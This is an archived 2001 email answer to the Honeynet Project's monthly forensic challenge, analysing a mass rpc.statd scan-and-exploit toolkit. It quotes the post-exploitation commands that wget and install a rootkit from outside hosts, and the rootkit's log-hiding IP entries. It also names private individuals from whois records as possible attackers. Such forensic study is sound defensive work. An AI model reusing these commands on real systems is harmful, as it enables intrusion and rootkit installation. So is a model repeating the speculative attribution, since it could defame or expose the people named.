From sigquit@hideout.art.ro Sat Mar 17 20:02:52 2001 Date: Mon, 12 Mar 2001 09:36:33 +0200 From: Octavian Popescu To: project@honeynet.org Subject: scan of the month - march [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Hello I'm sorry for the possible grammar mistakes but I wrote this quite in a hurry, between learning for two exams. ;) Anyway, here it goes: 1. What is the blackhat attempting to do with his command line syntax? After downloading and decompressing the tool, our hacker uses it to launch a mass scan for a well-known rpc.statd vulnerability. Please read "scan" as "scan and exploit". The two arguments of the "luckgo" script are the first two portions (bytes, if we talk in binary) of the IP addresses where from the scan begins. (216 210 <> 216.210.0.0) e.g. ./luckgo 216 210 means that all the addresses within the range [216-255].[210-255].[0-255].[0-255] will be scanned for an open 111 port, (rather useless since the C class ends at 223). The first address being scanned will be 216.210.0.0, the second one 216.210.0.1 and so on. 2,3. What does the tool accomplish? How does the tool work? First of all, the tool is built from several files, each one with a specific role: luckgo: Bash script that works as a frontend (a very colorful and useless one) for the next tools. The "if" condition from the lines 40-43 is never met - probably our script is a modified version (the ANSI part was added) of a more simple one. Its main purpose is to make "luckscan-a" scan the IP ranges provided as arguments, (explained earlier) for opened 111 ports. luckscan-a: the scanner. It accepts four arguments - the first,second and third byte of the IP address (I'll call them aa,bb,cc) and a port number. It scans the range aa.bb.cc.0 - 255.255.255.255 for the port specified as the second argument. In our case, the desired port is 111 (rpc.portmap) When it finds an IP with the port 111 open, it launches the rpc.statd exploit (luckstatdx) with that IP as an argument. luckstatdx: the exploit. This is a modified version of the rpc.statd exploit (statdx.c), coded by ron1n It is launched by luckscan-a with the '-d 0 ip_with_111_open' arguments (it is assumed that the victim os is a Redhat 6.2) luckscan-a.c, luckstatdx.c - the presumed sources for the executables above. (we'll see later that things are a little bit different) Step by step: * luckgo launches luckscan-a on the desired ranges. * luckscan-a begins scanning for servers with ports 111 opened. * when a server is found, luckstatdx is launched with that server's name as an argument. * luckstatdx - if the overflow succeeds, the following line is written to the socket and executed on the remote system: "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz" (or at least this is what luckstatdx.c tells us) In other words, after confirming that you can execute commands remote, the program downloads non-interactively a rootkit from another server,on the hacked system, and installs it. As mentioned before, this tool is based on a rpc.statd vulnerability, discovered by Daniel Jacobowitz in July '00 Briefly about the vulnerability: rpc.statd passes user-supplied data,via syslog() function, without validating it. A user may supply machine code to be executed with the privileges of the rpc.statd process (root). 4. Is this tool a worm, or would you classify it as something else? I guess I already answered this one. It's not a worm, but an automated mass vulnerability scanner and exploiter. The main difference between a worm and our tool is that the last one doesn't propagate by itself. It only scans for vulnerable systems, exploits them, installs the rootkit and then stops. Yet, with some minor modifications, it could be trasformed into a ramen-like worm. ;) 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? The statd exploit (luckstatdx.c) is based on ron1n's statdx.c, published to BUGTRAQ on 5 Aug 2000. Modifications - some lame credits were added,extra commands are written to the socket after the overflow succeeds, (the wget part) and some of the default messages are replaced. Also, the scanner (luckscan-a.c) is based on an older tool, pscan.c. Modifications - when an open port was found, the original tool was only printing the IP address and then kept on scanning. luckscan-a also launches the statd exploit when finding a presumely vulnerable server. 6. What information can you obtain about who is using or created the tool? I'll try to point only the information that can lead to an identification of the intruder. * www.becys.org Whois data: Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Phone- (979)862-9233 Hosted by websitesource.com. * luckscan-a Compiled on a Redhat system (probably 6.2) * luckstatdx The first thing to be noticed is that this isn't the compiled version of the "luckstatdx.c" found in the LUCKROOT.TAR archive. If we browse through the binary, we'll notice the following: * the web-server that hosts the rootkit is different from the one in the source. * the rootkit's archive name is also different. Anyway, here are the new commands that will be sent to the socket after the overflow occures: "cd /; uname -a; id; wget neamtu.lsa.ro/rg.tgz; tar zxvf rk.tgz; cd 2; ./install.sh; cd /; rm -rf rk.tgz; rm -rf 2" The fun part is that due to a typo, the rootkit won't be installed at all. Anyway, "neamtu.lsa.ro" points us to Romania. This host doesn't seem to exist anymore, but a whois lookup on the domain "lsa.ro" shows some neat stuff: person: Dragos Ionut address: Brodway 6.0 address: NewYork address: Ny 32123 address: US phone: +1 323 23232 e-mail: taune@digitalunix.org A probably fake identity and a legit email address. If we play around a little bit more with whois and dns records, we'll finally discover that one legit romanian company that sells among other stuff, internet services, uses as a secondary nameserver one of the hosts involved in the attack. I'd better stop now ;) Now for the rootkit: The "install" script contains some interesting info: echo "1 193.231.139" >>/dev/caca echo "1 213.154.137" >>/dev/caca echo "1 193.254.34" >>/dev/caca These are supposed to be the IP addresses which shouldn't show up in the system's logs,processes (ps,top) or at netstat -an. Let's see: inetnum: 193.231.139.0 - 193.231.139.255 netname: ROEDUNET-LICEE1 descr: Allocated to ROEDUNET connected highschools What a surprise! :) inetnum: 213.154.135.0 - 213.154.140.255 netname: PCNET descr: PCNET - ATM-ADSL Network PCNET is a romanian ISP - I guess these are the IPs assigned to dialup. inetnum: 193.254.34.0 - 193.254.34.15 netname: FININVNET descr: FININVEST country: RO That would be all. Thanks for the patience.